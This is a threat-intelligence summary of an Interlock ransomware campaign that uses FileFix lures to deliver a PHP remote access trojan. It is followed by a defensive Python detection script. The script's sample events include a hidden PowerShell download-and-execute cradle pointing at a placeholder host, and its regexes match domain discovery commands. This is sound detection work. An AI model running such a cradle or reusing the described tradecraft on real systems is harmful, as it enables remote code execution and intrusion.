2025-07-24

FileFix Pushes Interlock RAT with Browser-Triggered PowerShell Execution Chain

Level: Tactical | Source: DFIR Report


A new wave of activity attributed to the Interlock ransomware group has been observed delivering a PHP-based variant of the Interlock remote access trojan (RAT), building on tradecraft used in the ongoing ClickFix campaign. According to findings from The DFIR Report and Proofpoint, this activity surged in May 2025, coinciding with the shift from the ClickFix technique, heavily active since October 2023, to a newer variant called FileFix. FileFix differs by abusing the browser's file explorer functionality to initiate execution instead of using the Windows Run dialog. The Interlock RAT campaign has been linked to the KongTuke (aka LandUpdate808) web-inject threat cluster, which uses injected JavaScript and misleading CAPTCHA verification steps to socially engineer execution. "Proofpoint researchers have observed both Interlock RAT Node.js and Interlock RAT PHP based variants. The Interlock RAT PHP based variant was first spotted in June 2025 campaigns," as reported by The DFIR Report and Proofpoint.

The infection chain starts by coercing users into triggering command execution from the browser file explorer, where a PowerShell script is executed in a hidden window. The script initiates contact with a remote server using DownloadString piped to iex, with no visible prompts. This downloads the Interlock RAT PHP variant, which executes from the user's roaming profile directory using "php.exe," referencing a ".cfg" configuration file. Once active, the malware initiates system reconnaissance with commands such as "systeminfo," "tasklist," "Get-PSDrive," and "Get-Service." Additional hands-on discovery includes Active Directory enumeration via [adsisearcher], "nltest /dclist," and domain enumeration using "net user /domain." These commands are delivered through "cmd.exe /c" and PowerShell.

Interlock RAT establishes command and control via a Cloudflare-based tunnel leveraging trycloudflare[.]com, with hardcoded fallback IPs ensuring resiliency. Commands issued via this channel let the threat actor deploy payloads as .exe or .dll files and execute shell commands; the malware can also disable itself on receipt of an OFF command. Persistence is set through the user’s Run key, referencing the RAT’s PHP loader and configuration file. Post-compromise activity includes RDP-based lateral movement, supported by earlier discovery of valid credentials and domain structures. As the campaign leverages variations of a prominent attack technique and has evolved with iterations in May and June 2025—using both Node.js and PHP-based variants—monitoring threat behaviors by the Interlock group remains critical given the sustained activity of this threat.
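The behaviours described above (a browser-spawned hidden PowerShell download cradle, php.exe running from the roaming profile with a .cfg argument, and discovery commands spawned by php.exe) as a small detection pass over constructed Sysmon-style process-creation events. This is an added example, not code from The DFIR Report, Proofpoint or Anvilogic; the paths, user name and URL are made-up placeholders, and the last event is a benign control that should not fire.

```python
import os
import re

# Constructed Sysmon-style process-creation events (not real telemetry) mirroring the
# chain: browser -> hidden PowerShell cradle -> php.exe from %APPDATA% -> discovery.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "powershell.exe -w hidden -c \"iex((New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/x'))\""},
    {"image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"php.exe C:\Users\alice\AppData\Roaming\php\loader.php "
                r"C:\Users\alice\AppData\Roaming\php\settings.cfg"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "cmdline": "cmd.exe /c nltest /dclist:"},
    {"image": r"C:\Windows\System32\cmd.exe",          # benign control: helpdesk lookup
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c net user alice /domain"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Discovery commands named in the report; matched case-insensitively on the command line.
DISCOVERY = re.compile(r"systeminfo|tasklist|nltest\s+/dclist|net\s+user\b.*\s/domain|"
                       r"get-psdrive|get-service|adsisearcher", re.I)
CRADLE = re.compile(r"downloadstring.*\biex\b|\biex\b.*downloadstring", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)

def basename(path):
    """Case-folded file name of a Windows path, so rules work on any host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()

def classify(event):
    """Return the names of the report-described behaviours this event matches."""
    hits = []
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    if image == "powershell.exe" and parent in BROWSERS and CRADLE.search(cmd):
        hits.append("browser_spawned_powershell_cradle")
        if HIDDEN.search(cmd):
            hits.append("hidden_window")
    if image == "php.exe" and "\\appdata\\roaming\\" in event["image"].lower() and ".cfg" in cmd.lower():
        hits.append("php_rat_roaming_profile")
    if parent == "php.exe" and DISCOVERY.search(cmd):
        hits.append("discovery_from_php_parent")
    return hits

def triage(events):
    """Map event index -> matched behaviours, keeping only events that fired a rule."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

Correlating the three hits on one host within a short window is the stronger signal; each rule alone will produce some benign matches in environments that legitimately run PHP or PowerShell cradles.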
